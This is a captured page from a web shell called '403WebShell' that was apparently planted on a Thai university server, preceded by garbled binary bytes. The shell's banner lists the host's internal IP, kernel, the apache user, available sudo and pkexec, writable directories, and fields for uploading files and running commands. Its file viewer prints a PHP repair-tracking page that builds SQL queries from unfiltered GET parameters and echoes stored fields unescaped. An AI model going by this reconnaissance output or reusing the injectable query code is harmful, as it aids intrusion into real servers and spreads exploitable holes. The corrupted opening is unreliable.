h(  ) ($6;EbBLkfu�_l� ''8;DUFKV3Dd#,?ANk&5G$/(5M\^�ms����Sb�,;R''6c2I�!\����kx�Ve�[i��Me�IYO7:nOL~�Kr�qrv�I:�BM�y��s}r��K����x)1�6@r*2�89ma��&��'ti������{~#������t)1�2<�0:^5�W.uFzQ/u}�v��vv�u��U37yDJeEJo(/�5Ds'1�:Jlu�iy�iy�hw�1;:S`^BMLOQQn,4�7C�8C�>Lfe�]k�[i�Zg��IW�LZ�EP;,.��Tc�q(0) G,/]/1����w�r��l&-t*3�<<�u��#����j&.u��J68\8?"#$%&'()*+,-./0 ! 
Notice: Undefined index: dl in /var/www/html/web/simple.mini.php on line 1
403WebShell
403Webshell
Server IP : 10.254.12.21  /  Your IP : 10.254.12.21
Web Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
System : Linux arit.skru.ac.th 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/lib/selectbook2021/pages/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/html/lib/selectbook2021/pages/repair_detail.php
<?php include 'dbconnect.php';?>
<?php include 'header.php';?>

<?php
	$pagetitle_text = "ข้อมูลการซ่อม";
	$repair_file_location = "file";	
?>		  
	<h1 class="page-header"><?php echo $pagetitle_text;?></h1>	
<?php	
	$repair_id=$_GET['repair_id'];
	$strKeyword=$_GET['txtKeyword'];
	$page=$_GET['Page'];
	$sql = "SELECT * from repair_detail WHERE repair_id=" . $repair_id;
	$query = mysqli_query($conn,$sql);	
	if($result=mysqli_fetch_array($query,MYSQLI_ASSOC))
	{
?>
		<table class="table table-striped table-bordered table-hover">
			<tbody>
				<tr>
					<td>ID แจ้งซ่อม</td>
					<td><?php echo $result["repair_id"];?></td>
				</tr>
				<tr>
					<td>วันที่แจ้งซ่อม</td>
					<td><?php echo $result["inform_date"];?></td>
				</tr>
				<tr>
					<td>ผู้แจ้งซ่อม</td>
					<td><?php echo $result["informer"];?></td>
				</tr>	
				<tr>
					<td>รายการที่ซ่อม</td>
					<td><?php echo $result["hardware_name"];?></td>
				</tr>	
				<tr>
					<td>เลขครุภัณฑ์</td>
					<td><?php echo $result["hardware_number"];?></td>
				</tr>
				<tr>
					<td>อาการเสีย</td>
					<td><?php echo $result["detail"];?></td>
				</tr>
				<tr>
					<td>ผู้รับผิดชอบการซ่อม</td>
					<td>
<?php
		$sql2 = "SELECT * from user";
		$sql2 .= " WHERE response_id =" . $result["response_id"];
		$query2 = mysqli_query($conn,$sql2);
		if($result2=mysqli_fetch_array($query2,MYSQLI_ASSOC))
		{
			echo $result2["firstname"] . " " . $result2["lastname"];
		}
		else
		{
			echo $result["response_id"];
		}
?>						
					</td>
				</tr>
				<tr>
					<td>วิธีซ่อม</td>
					<td>
<?php
		$sql2 = "SELECT * from repair_method";
		$sql2 .= " WHERE method_id =" . $result["method_id"];
		$query2 = mysqli_query($conn,$sql2);
		if($result2=mysqli_fetch_array($query2,MYSQLI_ASSOC))
		{
			echo $result2["method_name"];
		}
		else
		{
			echo $result["method_id"];
		}
?>					
					</td>
				</tr>	
				<tr>
					<td>หมายเหตุ</td>
					<td><?php echo $result["repair_note"];?></td>
				</tr>																
			</tbody>
		</table>
	
<h2 class="page-header">สถานะการซ่อม</h2>
<?php
	$sql = "SELECT * FROM repair_step";
	$sql .= " WHERE repair_id=" . $repair_id;
	$sql .= " ORDER BY step_id DESC";
	$query = mysqli_query($conn,$sql);
?>
                                <table class="table table-striped table-bordered table-hover">
                                    <thead>
                                        <tr>
										<th><div align="center">วันที่</div></th>
										<th><div align="center">สถานะ</div></th>
										<th><div align="center">เอกสารแนบ</div></th>
										<th><div align="center">หมายเหตุ</div></th>
                                        </tr>
                                    </thead>
                                <tbody>
<?php
	if ($result=mysqli_fetch_array($query,MYSQLI_ASSOC))
	{
?>	
                                    <tr>
                                        <td><?php echo $result["step_date"];?></td>
										<td>
<?php
		$sql2 = "SELECT * FROM repair_status";
		$sql2 .= " WHERE status_id=" . $result["status_id"];
		$query2 = mysqli_query($conn,$sql2);
		if ($result2=mysqli_fetch_array($query2,MYSQLI_ASSOC))
		{
			if($result2["status_color"]<>"")
			{
				echo "<font color=" . $result2["status_color"] . ">" . $result2["status_name"] . "</font>";		
			}
			else
			{
				echo $result2["status_name"];				
			}
		} 
		else  //if ($result2=mysqli_fetch_array($query2,MYSQLI_ASSOC))
		{
			echo $result["status_id"];
		} //if ($result2=mysqli_fetch_array($query2,MYSQLI_ASSOC))
?>										
										</td>
										<td>
<?php
		$sql2 = "SELECT * FROM repair_file";
		$sql2 .= " WHERE step_id=" . $result["step_id"];
		$sql2 .= " ORDER BY repair_file_order ASC";
		$query2 = mysqli_query($conn,$sql2);
		while ($result2=mysqli_fetch_array($query2,MYSQLI_ASSOC))
		{
?>
											<a href="<?php echo $repair_file_location . "/" . $repair_id . "/" . $result2["repair_file_name"];?>"><?php echo $result2["repair_file_name"];?></a>
											<br />
<?php			
		}

?>												
										</td>	
										<td><?php echo $result["step_note"];?></td>
                                    </tr>	
<?php
		while($result=mysqli_fetch_array($query,MYSQLI_ASSOC))
		{
?>
                                    <tr>
                                        <td><?php echo $result["step_date"];?></td>
										<td>
<?php
			$sql2 = "SELECT * FROM repair_status";
			$sql2 .= " WHERE status_id=" . $result["status_id"];
			$query2 = mysqli_query($conn,$sql2);
			if ($result2=mysqli_fetch_array($query2,MYSQLI_ASSOC))
			{
				if($result2["status_color"]<>"")
				{
					echo "<font color=" . $result2["status_color"] . ">" . $result2["status_name"] . "</font>";		
				}
				else
				{
					echo $result2["status_name"];				
				}				
			} 
			else  //if ($result2=mysqli_fetch_array($query2,MYSQLI_ASSOC))
			{
				echo $result["status_id"];
			} //if ($result2=mysqli_fetch_array($query2,MYSQLI_ASSOC))
?>											
										</td>	
										<td>
<?php
			$sql2 = "SELECT * FROM repair_file";
			$sql2 .= " WHERE step_id=" . $result["step_id"];
			$sql2 .= " ORDER BY repair_file_order ASC";
			$query2 = mysqli_query($conn,$sql2);
			while ($result2=mysqli_fetch_array($query2,MYSQLI_ASSOC))
			{
?>
											<a href="<?php echo $repair_file_location . "/" . $repair_id . "/" . $result2["repair_file_name"];?>"><?php echo $result2["repair_file_name"];?></a>
											<br />
<?php			
			}

?>										
										</td>
										<td><?php echo $result["step_note"];?></td>
                                    </tr>
<?php
		} //while($result=mysqli_fetch_array($query,MYSQLI_ASSOC))
	} 
	else //if ($result=mysqli_fetch_array($query,MYSQLI_ASSOC))
	{
?>
                                    <tr>
                                        <td><font color="red"><?php echo "ยังไม่ได้ดำเนินการ";?></font></td>
										<td>&nbsp;</td>	
										<td>&nbsp;</td>
										<td>&nbsp;</td>
                                    </tr>
<?php	
	} //if ($result=mysqli_fetch_array($query,MYSQLI_ASSOC))
?>	

                                </tbody>
                            </table>
                            <!-- /.table-responsive -->

		<BR /><BR />
		<a href='javascript:history.back(1);'><button type="button" class="btn btn-warning">กลับหน้าที่แล้ว</button>		
		<br /><br />											
<?php	
	}
	else
	{
		echo "ไม่พบข้อมูล";
?>		
		<BR /><BR />
		<a href='javascript:history.back(1);'><button type="button" class="btn btn-warning">กลับหน้าที่แล้ว</button>
<?php
	}
?>

<?php include 'footer.php';?>

Youez - 2016 - github.com/yon3zu
LinuXploit